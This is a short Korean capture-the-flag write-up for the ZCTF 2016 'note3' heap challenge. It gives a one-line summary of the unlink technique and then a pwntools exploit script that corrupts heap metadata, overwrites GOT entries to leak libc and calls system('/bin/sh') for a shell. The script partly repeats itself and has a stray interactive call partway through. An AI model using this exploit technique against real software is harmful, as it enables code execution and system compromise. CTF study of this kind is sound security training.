ZCTF_2016_note3

간단한 unlink이다
unlink 사용법 : fd(전역변수-0x18)+bk(전역변수-0x10)+prev_size(앞의사이즈-0x10)+prev_inuse해제(사이즈-0x1)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from pwn import *
 
def new(size,content):
        sla('>>','1')
        sla(')',str(size))
        sla(':',content)
 
def edit(idx,content):
        sla('>>','3')
        sla(':',str(idx))
        sla(':',content)
 
from pwn import *
 
def new(size,content):
        sla('>>','1')
        sla(')',str(size))
        sla(':',content)
 
def edit(idx,content):
        sla('>>','3')
        sla(':',str(idx))
        sla(':',content)
 
def delete(idx):
        sla('>>','4')
        sla(':',str(idx))
 
 
r=process('./note3')
e=ELF('./note3')
libc=e.libc
 
sla = lambda x,y : r.sendlineafter(x,y)
ru = lambda x : r.recvuntil(x)
 
for i in range(8):
        new(0x80,'A'*8)
 
fuck=-9223372036854775808
 
edit(3,'A')
payload=p64(0)+p64(0x81)
payload+=p64(0x6020c0-0x18+0x20)+p64(0x6020c0-0x10+0x20)
payload+='\x00'*0x60
payload+=p64(0x80)+p64(0x90)
edit(fuck,payload)
 
delete(4)
 
payload2=p64(e.got['free'])*2+p64(e.got['atoi'])*2
 
edit(3,payload2)
edit(1,p32(e.plt['puts'])+'\x00\x00')
 
r.interactive()
delete(2)
 
r.recv(1)
 
leak = u64(ru('\x7f').ljust(8,'\x00'))-libc.symbols['atoi']
log.info(hex(leak))
 
edit(3,p64(leak+libc.symbols['system']).replace('\x00',''))
sla('>>','/bin/sh')
 
 
r.interactive()
Colored by Color Scripter
cs